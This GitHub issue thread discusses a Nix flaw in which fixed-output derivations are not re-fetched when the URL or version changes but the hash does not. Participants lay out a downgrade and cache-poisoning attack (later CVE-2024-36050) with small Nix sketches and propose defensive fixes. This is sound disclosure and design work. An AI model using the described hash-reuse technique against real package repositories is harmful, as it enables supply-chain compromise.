re-fetch source when url changes #969
In fixed-output derivations, the hash is content-addressed. We could make the URL part of the hash, but then a mirror/URL change would trigger a rebuild, which is very unfortunate. I propose changing the workflow for how you update sources, but I realize that's poor UX.
I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this. One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.
@domenkozar: Could you expand on "I propose you change the workflow how you change sources, but I realize that's poor UX."?
@copumpkin: What I mean is: Nix will write the old source in the store, under the new name. It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.
@ both of you: it seems this issue is not as easy to fix as I hoped.
I'm confused. The way Nix thinks about fixed-output derivations is as follows:
So here are the scenarios I can think of:
It sounds like you're saying (3) is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?
@copumpkin: I'm talking about when you change the version (or name in general) of the pkg and the url, but not the hash. Sorry for the confusion, hope I'm clear now.
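To make this concrete, here is a minimal sketch (hypothetical URLs, placeholder hash, assuming nixpkgs' `fetchurl` is in scope): both calls evaluate to the same store path, so editing only the `url` reuses whatever is already in `/nix/store`.

```nix
with import <nixpkgs> { };

{
  # Both derivations get the SAME outPath: for a fixed-output derivation the
  # output path is computed from the name (here derived from the url's
  # basename, "foo-1.0.tar.gz") and the declared hash; the url is not part of it.
  a = fetchurl {
    url = "https://example.org/foo-1.0.tar.gz"; # hypothetical upstream
    sha256 = "0000000000000000000000000000000000000000000000000000"; # placeholder
  };
  b = fetchurl {
    url = "https://mirror.example.net/foo-1.0.tar.gz"; # different mirror, same basename
    sha256 = "0000000000000000000000000000000000000000000000000000";
  };
}
```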
I see the opposite in my tests:
I would think that nix shouldn't care about a url change as long as the hash stays the same. But in reality the change of the url gives me both a redownload and a (massive) rebuild.
@veprbl we're talking about the realized derivation hash, not the derivation hash itself.
I was getting:
I ran:
And I deleted the results folder mentioned by the previous command. After that, nix-build picked up the changed URL.
I was thinking, would it make sense to add an option like
Doesn't Nix already track this for garbage-collection purposes?
I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionality like cache sharing between OfBorg and reviewers/Hydra is implemented) are described in NixOS/ofborg#68 (comment). What I propose to solve this is to keep on each Nix installation a map `drvPath -> outPath`.
EDIT: See my proposition here NixOS/ofborg#68 (comment) for a more robust version
@tobiasBora
After @risicle pointed me your way in NixOS/rfcs#171 (comment), and after reading your comments in NixOS/ofborg#68, I came up with a very simple, currently undetectable way to poison Hydra's cache in NixOS/rfcs#171 (comment):
But now thinking about this, I have an IMHO much simpler and thus scarier attack that _will_ work against Hydra:
- Malice makes an evil PR with a package update that changes the source's revision to a new version but points the hash to a hash
of an older version of the same package, a version which has a well-known CVE.
- A very paranoid Nixpkgs maintainer Alice (who does not use any build caches) looks at it, it looks fine, so she builds it, and it
works fine, since Alice has the older version of the source in `/nix/store`, and so she merges it.
- All tools that track unfixed CVEs in Nixpkgs only look at package versions, so those will be fooled too.
- Malice can now exploit the CVE.
So, this is actually a critical bug.
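For concreteness, a hedged Nix sketch of that first step (owner, repo, and hash are hypothetical, assuming nixpkgs' `fetchFromGitHub`):

```nix
# Downgrade sketch: rev claims the new release, but the sha256 still names
# the content of the old, vulnerable release.  Since fetchFromGitHub names
# its output "source" by default, the old output already in /nix/store
# matches by name and hash, nothing is re-fetched, and the build "succeeds".
src = fetchFromGitHub {
  owner = "example";      # hypothetical project
  repo = "example";
  rev = "v2.0.0";         # the new, supposedly fixed version...
  sha256 = "sha256-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; # ...placeholder for the v1.0.0 (CVE) hash
};
```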
Merging NixOS/nixpkgs#49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default, and banning custom-named source derivations is a workaround that will work in the meantime.
Yes, I actually realized exactly this issue this morning. As a result, I submitted a CVE online. Patching fetchzip as discussed in NixOS/rfcs#171 is only a first step, but it does not stop the slightly more involved cache-poisoning attacks. The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment)
That might be a first quick mitigation (actually not needed if we implement NixOS/ofborg#68 (comment)), but it is not sufficient. Nobody would notice if a derivation is misnamed, for instance in a long automatically generated file.
> The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment)
While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.
I.e. you are trying to prevent poisoning of your local `/nix/store` with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) `/nix/store` directly too by reusing old hashes.
> Merging NixOS/nixpkgs#49862, setting `nameSourcesPrettily = true` or `nameSourcesPrettily = "full"` by default
is one work-around for this.
As hinted in NixOS/rfcs#171 (comment), making `nix-store -r --check` semantics slightly more convenient:
- for a normal derivation, when the `outPath` is valid it should build the derivation again and check the result matches the previously known output exactly (as it does now),
- for a normal derivation, when the `outPath` is not valid, it should just build the derivation twice and compare the results (the current semantics of failing in this case is surprising and inconvenient),
- for a fixed-output, regardless of `outPath` validity, it should always do the build and then check the hash,
and then making OfBorg always run `nix-store -r --check` for all affected fixed-output derivations, thus limiting the set of attackers who could poison caches and `/nix/store`s to those who have direct commit access to Nixpkgs, is another work-around for this.
But the actual solution is to never reuse outputs between derivations without checking them first, i.e. Nix should remember a mapping of `outPath -> set<drvPath>` for each valid `outPath` in `/nix/store` (ATM Nix only stores one `drvPath` for each valid `outPath`, aka `nix-store -q --deriver`) and `nix-store -r` should force re-build (i.e. `--check`) each given derivation even if the corresponding `outPath` already exists and is valid in `/nix/store` in cases when that `outPath` does not have that `drvPath` in its `set<drvPath>` yet.
In other words, `/nix/store` path validity should be changed from being a flag ("is valid") to a predicate ("is valid as an output for this `drvPath`).
Similarly, substitutors should provide their `set<drvPath>` for each requested `outPath` to the client Nix'es (somehow) and a client Nix should check those before accepting a substitution.
Obviously, without any optimizations that would be incredibly inconvenient, as, among other things, not only changes to URLs and changes between `fetch*` functions would always cause a rebuild, but also any unrelated changes to `stdenv.mkDerivation` would cause all derivations using any of the `fetch*` functions to be rebuilt too.
One possible way to minimize rebuilds in this case is to implement a tiny `mkDerivationLite` variant of `stdenv.mkDerivation` and use that in all `fetch*` functions. Sure, updating `curl` or `git` will still cause a lot of rebuilds, but for the paranoid this could be a good thing: after all, what if the attacker poisoned one of those somehow.
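A hedged sketch of what such a variant might look like (`mkDerivationLite` and its interface are this thread's proposal, not an existing nixpkgs function):

```nix
# Hypothetical mkDerivationLite: a thin wrapper over the raw `derivation`
# primitive with no stdenv in its closure, so unrelated changes to
# stdenv.mkDerivation no longer change the drvPath of every fetch* derivation.
mkDerivationLite =
  { name, builder, args ? [ ], system ? builtins.currentSystem, ... }@attrs:
  derivation (attrs // { inherit name builder args system; });
```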
Another way to reduce rebuilds with `drvPath`-predicated-validity is to add a new `outputPathToken` parameter to `derivation` which would declare to Nix that the `outPath` of this derivation is valid for any other derivation that maps to the same `outPath` and uses the same `outputPathToken`, i.e. it would declare an equivalence class of valid `drvPath`s for each `outPath` (i.e., in the above, `set<drvPath>` becomes `set<drvPath or outputPathToken>`).
Then,
- the current minimal-rebuilds behavior can be achieved by always setting `outputPathToken` to some constant,
- keeping `outputPathToken` always unset will get you the most paranoid behavior at the cost of most rebuilds,
- precise control of what should or should not be rebuilt on changes to fixed-output derivations can be achieved by setting `outputPathToken` to different things in different `fetch*` derivations, e.g.
- set `outputPathToken` to `"fetchurl " + concatSepBy " " (sort urls)` in `fetchurl` so that changes to URLs would cause rebuilds,
- set it to `"fetchgit " + url + " rev " + rev` in `fetchgit` so that changes to URLs and revisions would also cause rebuilds,
- etc.
`nix.conf` could then provide an option to ignore all `outputPathToken` options, for the most paranoid.
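As a Nix sketch of the `fetchurl` bullet above (entirely hypothetical: `outputPathToken` does not exist in today's Nix; it is the parameter proposed here):

```nix
let
  urls = [
    "https://example.org/foo-1.0.tar.gz"        # hypothetical mirrors
    "https://mirror.example.net/foo-1.0.tar.gz"
  ];
in derivation {
  name = "foo-1.0.tar.gz";
  system = builtins.currentSystem;
  builder = "/bin/sh";           # placeholder fetch builder
  outputHashMode = "flat";
  outputHashAlgo = "sha256";
  outputHash = "0000000000000000000000000000000000000000000000000000"; # placeholder
  # Proposed parameter: derivations mapping to the same outPath may share the
  # output without a forced re-check only if their tokens match; editing the
  # url list changes the token and thus forces a re-fetch.
  outputPathToken = "fetchurl "
    + builtins.concatStringsSep " " (builtins.sort (a: b: a < b) urls);
}
```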
I have to admit I don't yet fully grasp all of your proposition, but here are a few comments after a first reading:
Well, I precisely want Nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data doesn't exist, you have no other way than regenerating it yourself) to check all FODs, which can lead to many issues. Not only would the user need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, but if the source is no longer available at its current location then the user would not even be able to install the binary (and the security team told me that they don't want to go down this path, as it used to be this way and created many issues).
If one changes nix the way I propose, I don't see how anyone could poison Hydra's cache (of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons). The new
I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance, to be sure it is in Hydra's cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.
I think this is more or less what I proposed, just the map is the other way around, as I was proposing `drvPath -> outPath` instead, & I also propose to let cache.nixos.org/… share this map.
What do you call a rebuild here? Is it in the sense that:
> (of course if we trust Hydra itself… but one anyway already needs to trust Hydra for many other reasons)
What reasons? If I'm not using the Hydra binary cache and I'm not using the default bootstrap tarballs what is there to trust? Tarballs downloaded from Hydra tarball cache get hashed and checked against hashes in their derivations locally, as they should.
> I don't see it as a true work-around. This makes a very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance, to be sure it is in Hydra's cache) a malicious dependency in some automatically generated files with the name & version of the program to attack.
Putting the whole revision or hash into the source derivation name and banning custom-named `fetch*` derivations will make that attack impossible.
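For concreteness, a call-site sketch of that naming scheme (package details hypothetical; `nameSourcesPrettily` itself is the NixOS/nixpkgs#49862 patch):

```nix
# With the version (or revision) baked into the source derivation's name, a
# PR that bumps rev but keeps the old hash maps to a *different* store path
# than the cached old source, so the stale output cannot be reused silently.
src = fetchFromGitHub {
  name = "example-1.2.3-source"; # version is part of the fixed-output name
  owner = "example";             # hypothetical package
  repo = "example";
  rev = "v1.2.3";
  sha256 = "sha256-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="; # placeholder
};
```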
But even without the first part (and with a `<hash>-<name>-<version or short revision>-source` scheme), sure, in theory, the attacker could still poison it by pre-`fetch*`ing an evil source in an autogenerated file with the same derivation name, if the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance.
So... almost never.
And then, users like me, who do not build anything from those huge autogenerated files and are not using the Hydra binary cache, will catch those mis-hashes immediately.
I'm running with NixOS/nixpkgs#49862 and `nameSourcesPrettily = "full"` enabled since 2018 (essentially, implementation details changed over time, but the behavior did not).
Do I use a small subset of Nixpkgs? Yes. Do source URLs still fail to fetch sometimes? Yes.
But usually things are pretty easy to fix, and older source versions usually can be found on archive servers without changes to any hashes.
But now, remembering the uncountable number of times I had to fix fixed-output hashes locally to make my systems build I'm feeling kind of paranoid.
Were all those outputs mis-hashed in honest error or were some of them attempts to poison something?
Some of those mis-hashes persisted for months in `master` while I was too annoyed with the PR process, thinking them honest errors that would be fixed eventually by people with direct commit access.
Was something poisoned already?
... implementation ...
> I think this is more or less what I proposed, just the map is the other way around, as I was proposing `drvPath -> outPath` instead, & I also propose to let cache.nixos.org/… share this map.
Yes, algorithmically we are proposing the same thing, but I'm essentially proposing we reuse the existing Nix derivers mechanism for this. While you are talking about how to make Hydra publish its derivers and make Nix use them, I'm pointing out that Hydra publishing its derivers is not enough: if Hydra does not have the output in its cache yet, then the user will have to `--fallback` build locally, meaning local Nix will have to do the check too, which means checking that the source derivation is in the checked derivers set of that output, which would frequently fail, which would mean frequent mass rebuilds. So I'm proposing a way to minimize those, and `outputPathToken` is a clever and simple solution, IMHO.
Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.
>> One possible way to minimize rebuilds […]
> What do you call a rebuild here? Is it in the sense that:
> - the FOD output should be re-checked by Hydra, to complete the map `drvPath -> outPath` (which indeed should be done by Hydra if the `fetch*` functions change, and I guess having a lite version of `mkDerivation` makes sense if these often change)
I.e., in the terminology I use in my proposal, you are stating that Nix should ask its substitutors for their derivers set for the `outPath` it tries to substitute and then check that source derivation is in that set. To which I agree.
> - the FOD output should be re-checked by the end user: this should NOT be the case, at least if Hydra already did it before and if we implement the sharing of `drvPath -> outPath` I was proposing above
Sure, if substitutors are enabled, then Nix should only do a "member of the set" check, not a full derivation rebuild (i.e. `nix-store -r --check`, which is what I call a "rebuild", because `nix build --rebuild` does it).
> - the whole world should be rebuilt: this should NOT be the case; once the user is assured that the hash is correct they can use the old derivation as before.
But if the user does not use Hydra, and `curl` changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.
Anyone relying on `cache.nixos.org` (which is likely 99% of users) needs to trust Hydra. Anyway, the attack I describe would also apply to people NOT using Hydra, so building everything from source will not help, since it will pick the wrong source.
I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of whether the actual program has a CVE or not) into a future release of any program, assuming they can simply guess the name of the release… which is trivial (these usually simply increase one by one and are often pre-released in an alpha form like
Is it really an experience we want for nix end users?
Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large, so I used a script to help me discard the good-looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet… the user anyway needs to rebuild everything. And if the package is a "legacy package", in the sense that it was built by Hydra before we even started to add this option, what I propose (maybe what you propose as well, I'm not sure I understand all the details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).
I'm not sure I understand all the details of your proposition here (maybe because I lack some knowledge of Nix's internals), but I think I get the big picture. I think creating equivalence classes of derivations (which, I think, could be a nice concept in general in Nix) could be a nice way to limit rebuilds in case of curl updates… but your implementation with
So based on the first point, since it seems hard to only allow specific fetchers to create a given
and Nix should automatically understand that, when receiving this derivation, it should download the url, using any curl version it wants, as long as the hash matches at the end. If we don't want to hardcode all of them in Nix itself (let's try to keep Nix small), we can let Nix take as input a special nix file. More specifically, this idea of equivalence of fetchers can certainly also be used to solve other issues with non-deterministic processes. For instance, for now we have no solution to avoid hash shifts with
where the hash only corresponds to the "stable" part of the package, i.e. what is outside
Well, checking the source, I agree it's nice to have… but no need to recompile programs.
> Well, checking the source, I agree it's nice to have… but no need to recompile programs.
Most of my mentions of "rebuild" above imply the context of "rebuild the source (`<name>.src`) derivation".
Package derivations (`<name>`) should not be rebuilt, of course.
>> What reasons?
> Anyone relying on `cache.nixos.org` (which is likely 99% of users) needs to trust Hydra...
> ...
> Anyway, the attack I describe would also apply to people NOT using Hydra, so building everything from source will not help since it will pick the wrong source.
My point exactly.
Some users have personal and/or shared build machines, and `/nix/store`s on those can be poisoned too.
So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.
>> If the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.
> I think you misunderstand the attack I have in mind. ...
I'm referencing the exploit described in #969 (comment) there.
>> But now, remembering the uncountable number of times I had to fix fixed-output hashes locally
> Is it really an experience we want for nix end users?
Well, those hashes are factually wrong, either in honest error, or in malice.
That's just the reality of the situation.
If Hydra or OfBorg verified them all, then those packages would have been fixed in `master` instead of in my local branches.
>> which would mean frequent mass rebuilds
> I don't see why we would get more rebuilds than now.
In the context I discuss there, say `curl` changes; now all `<name>.src` derivations that use `fetchurl` have to be rebuilt.
>> Precise formats of `outputPathToken` for different `fetch*`ers and their security implications could and should be discussed.
> ... trusted fetchers ...
Hmm, that's a good point. Specifically, yes, `outputPathToken`s are probably not a good solution when the attacker can also modify the `fetch*` derivations themselves, so it would at the very least still leave OfBorg vulnerable.
```
Derive([("out", "/nix/store/foo.tar.xz", "sha256", "somehash")],
       [("kind", "fetchurl"),
        ("url", "myurl")])
```
Making full-featured `curl` into a Nix builtin is a possibility (as opposed to `fetchurlBoot` that exists now), but what about derivations fetched with `curl` and then unpacked with `zip` (like `fetchFromGitHub`)? Should `zip` be a builtin too? What about those fetched with `git`?
Even if it's just `curl` and `zip`, you'd also have to make Nix depend on SSL CAs to verify HTTPS certs, otherwise the hashes could be poisoned on your developer machine by MITMing your Nix HTTP traffic, and the ca-certs derivation is also non-trivial.
Also, at the moment Nix built with all the optional things disabled is pretty small and can be used for minimal self-bootstrap, requiring all those things will make things harder.
So: Is it possible to do? Yes. Is it a desirable solution? Probably not.
>> Was something poisoned already?
> Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (but it is possible to apply a different attack so that this does not appear that clearly). The number of duplicated hashes is quite large, so I used a script to help me discard the good-looking ones, but most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.
How are you doing this, exactly? Are you parsing Nix files by hand?
`nix-env -f ./default.nix -qa --argstr system "x86_64-linux" --attr-path --drv-path --out-path` gives the output that has the right data (after all, we need to check that different `--attr-path`s don't reuse or downgrade `--out-path`s), but it only evaluates package derivations, not source derivations.
If it did, running that on successive revisions of Nixpkgs, parsing the outputs, building a DB from the results, and then printing `--out-path` reuses and downgrades would be a good first step.
(Expensive to do, though. Especially since I don't have enough memory to evaluate all of Nixpkgs in a single run of `nix-env -qa` already, and evaluating a subset is kinda useless, given that any of the autogenerated package sets can be poisoned.)
I guess the simplest way to do this (cheaper than doing `nix-env -qaP` followed by `nix-instantiate -A` on all `--attr-path`s, then `nix-store -q --requisites`, followed by parsing the `.drv` files manually, which would be crazy expensive to do and will also torture your SSD) would be to implement a `nix-env -q --all` option, so that `nix-env -f ./default.nix -q --all --argstr system "x86_64-linux" --attr-path --drv-path --out-path` would print that data for _all_ `derivation`s Nix encounters while doing evaluation, not only the ones `--available` from the current Nix expression.
My ability to patch Nix sources is fairly superficial ATM and I don't really care for this much, given that NixOS/nixpkgs#49862 with a small custom-name-warning change on top basically solves the problem for me (given that I don't use Hydra).
But it would be nice if someone could implement that `nix-env -q --all` and then possibly somebody else would share all those evaluations on a bunch of revisions of `master`, so that we could check if Hydra and all users using it were PWNed yet.
This issue has been mentioned on NixOS Discourse. There might be relevant details there: https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19
I'm not sure why my last answer was not posted. In the meantime, the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050
Good, I just wanted to be sure we are on the same page.
Definitely agree. My point was just to try to reduce the amount of downloaded material from the user's perspective by using the cache when available; otherwise users (especially those with little bandwidth) would suffer a lot, and if the source has changed they would get 404 errors even if it is still cached.
I show here a much more generic attack: https://github.com/leo-colisson/CVE_NixOs_cache_spoil/ with some variants using
Would result in:
Yeah I see now, hence my proposition to have trusted fetchers.
Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing
That's precisely why I don't want to include this in Nix directly, but provide to nix a
This way, when a user calls
(see that it is agnostic of
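For illustration, a hedged guess at the shape such a file could take (the whole mechanism is hypothetical; `builtins.fetchurl`/`builtins.fetchGit` stand in for whatever Nix would run internally):

```nix
# Hypothetical "trusted fetchers" file: maps a fetcher kind to a function
# that Nix itself runs (with its own curl/git) to realize a fixed-output
# derivation of that kind, independently of which fetch* wrapper or nixpkgs
# revision produced the derivation.
{
  fetchurl = { url, ... }: builtins.fetchurl url;
  fetchgit = { url, rev, ... }: builtins.fetchGit { inherit url rev; };
}
```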
Right now this is done in a very dirty way, via a simple grep (install
You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance if I see the same url twice around the good lines, but this is very dirty, and I don't consider this any good security measure. Even with this sorting there are quite a lot of entries to read manually, so it would be better to actually extract all such
Currently the source is only re-fetched when the hash changes.
When you use `nix-env -i` to find the new hash, but forget to make a change to the hash, you are stuck with the wrong source. To add insult to injury: the source is then not re-fetched when you change the hash: you first have to garbage-collect the old source.